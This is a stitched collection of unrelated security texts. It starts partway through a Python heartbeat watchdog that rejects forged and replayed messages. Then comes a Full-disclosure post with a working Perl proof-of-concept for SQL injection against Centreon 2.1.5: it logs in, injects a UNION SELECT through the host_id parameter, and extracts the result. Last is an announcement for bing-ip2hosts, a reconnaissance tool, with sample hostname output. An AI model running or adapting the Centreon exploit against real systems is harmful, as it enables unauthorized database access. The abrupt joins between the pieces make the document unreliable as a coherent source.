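        self.grace = grace
        self.last_seen = {}   # channel -> arrival time of last accepted heartbeat
        self.last_seq = {}    # channel -> highest sequence number accepted
        self.rejected = 0     # forged or replayed heartbeats, worth logging

    def receive(self, msg, now):
        hb = parse_heartbeat(msg)
        if hb is None or hb["ch"] not in self.channels:
            self.rejected += 1
            return False
        ch = hb["ch"]
        if hb["seq"] <= self.last_seq.get(ch, -1):   # replay of an old heartbeat
            self.rejected += 1
            return False
        self.last_seq[ch] = hb["seq"]
        self.last_seen[ch] = now   # trust our own clock, not the sender's timestamp
        return True

    def silent_channels(self, now):
        return [c for c in self.channels
                if now - self.last_seen.get(c, float("-inf")) > self.grace]

    def state(self, now):
        silent = self.silent_channels(now)
        if len(silent) == len(self.channels):
            return "alert"
        return "degraded" if silent else "ok"


def simulate():
    """Constructed timeline: both channels beat every 60 s; the wire is cut after
    t=300, GSM is jammed after t=360, then a forged and a replayed heartbeat arrive."""
    wd = Watchdog(channels=("gsm", "net"), grace=150)
    states = {}
    seq = 0
    for t in range(0, 361, 60):
        for ch in ("gsm", "net"):
            if ch == "net" and t > 300:
                continue                        # wire cut: no more net heartbeats
            wd.receive(make_heartbeat(ch, seq, t), now=t)
        seq += 1
    states[400] = wd.state(400)                 # gsm seen at 360, net at 300: ok
    # Someone without the key tries to keep the remote box quiet.
    forged = make_heartbeat("gsm", 99, 480, key=b"wrong-key")
    replayed = make_heartbeat("gsm", 0, 0)      # the very first beat, sent again
    wd.receive(forged, now=480)
    wd.receive(replayed, now=480)
    states[480] = wd.state(480)                 # net silent 180 s > grace: degraded
    states[520] = wd.state(520)                 # gsm silent 160 s too: alert
    return states, wd.rejected


if __name__ == "__main__":
    print(simulate())
```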
[Full-disclosure] Vulnerability Centreon IT & Network Monitoring v2.1.5
#!/usr/bin/perl
# //[PoC]-//
#
# Title   : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author  : Jonathan Salwan (j.sal...@sysdream.com)
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1
#
# http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1
#
#
# //---[Credit]---//
#
# http://www.sysdream.com/article.php?story_id=328&section_id=78
# http://www.shell-storm.org
#

use strict;
use warnings;
use LWP::UserAgent;

my $url   = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql   = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1';

my $ua = LWP::UserAgent->new;

# Fetch the login page to obtain the session cookie.
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

# Log in with the session cookie (the header name must be quoted: a bareword
# Content-Type does not parse as a single hash key).
my $req2 = $ua->post($url,
    { useralias => $login, password => $paswd, submit => 'login' },
    Cookie         => $cook,
    'Content-Type' => 'application/x-www-form-urlencoded',
);

# Request the injected page with the authenticated session.
$response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

open(FILE, '>sql-centreon.txt');
print FILE $content;
close(FILE);

print "\n[Answer SQL Injection]\n\n";
my $selection = system('cat sql-centreon.txt | grep ">Host"');
unlink('sql-centreon.txt');
print "\n";
[Full-disclosure] [TOOL] Version 0.2 of bing-ip2hosts released
I've just released version 0.2 of bing-ip2hosts.

Introduction
------------
Bing.com is a search engine owned by Microsoft formerly known as MSN Search and Live Search. It has a unique feature to search for websites hosted on a specific IP address. This feature can be used with the IP: parameter in the search query as shown in the image above.

Bing-ip2hosts uses this feature to enumerate all hostnames which Bing has indexed for a specific IP address. This technique is considered best practice during the reconnaissance phase of a penetration test in order to discover a larger potential attack surface.

Bing-ip2hosts is written in the Bash scripting language for Linux. This uses the mobile interface and no API key is required.

Changes
-------
* You can enter a hostname not just an IP, eg. bing-ip2hosts foo.com
* Uses /tmp instead of the current path for creating temporary files
* Optional CSV output. Outputs the IP and hostname on each line, separated by a comma.
* Optionally prefix hostnames with http:// so they can be right-clicked in the shell

Example Usage
-------------
Pit one search engine against another

$ bing-ip2hosts www.google.com
66.102.7.104
code.google.com
desktop.google.ca
desktop.google.com
desktop.google.com.ar
desktop.google.com.br
desktop.google.cz
desktop.google.es
desktop.google.it
desktop.google.jp
desktop.google.nl
desktop.google.sk
ejabat.google.com
finance.google.co.uk
guru.google.co.th
hp-eds.com
otvety.google.ru
toolbarqueries.google.com.sv
toolbarqueries.google.de
toolbarqueries.google.fr
toolbarqueries.google.it
www.desktop.google.be
www.google.com
www.google.uz

Hope for undocumented facebook stuff and get disappointed

$ ./bing-ip2hosts -p developers.facebook.com
http://ar-ar.facebook.com
http://clk.facebook.com
http://da-dk.facebook.com
http://de-de.facebook.com
http://developers.connect.facebook.com
http://developers.facebook.com
http://developers.facebook.dk
http://developers.facebook.es
http://developers.facebook.pl
http://developers.facebook.se
http://developers.facebook.vn
http://es-es.facebook.com
http://it-it.facebook.com
http://ja-jp.facebook.com
http://nb-no.facebook.com
http://pt-br.facebook.com
http://stanford.facebook.com
http://sv-se.facebook.com
http://wiki.developers.facebook.com
http://www.facebook.com

Find some websites hosted by the BBC and wonder wtf they're doing

$ ./bing-ip2hosts -p bbc.co.uk
http://bbc.co.uk
http://bbcstudiosandpostproduction.com
http://censsa.co.uk
http://cheapserve.co.uk
http://cheekboneonline.com
http://coconutloving.com
http://cybusindustries.net
http://desperaterussianhousewives.co.uk
http://geocomtex.net
http://haroldsaxon.co.uk
http://itsnoteasybeinggreen.org
http://kodiakjackcabins.com
http://rudemasood.co.uk
http://shamansburys.com
http://tv-anytime.org
http://venusclinic.co.uk
http://www.bbc.co.uk

Homepage
--------
http://www.morningstarsecurity.com/research/bing-ip2hosts

If you find anything really interesting with bing-ip2hosts then I'd like to hear from you.

--
Cheers,
Andrew Horton
MorningStar Security
Mobile +64 (0) 272 646 959
Web http://www.morningstarsecurity.com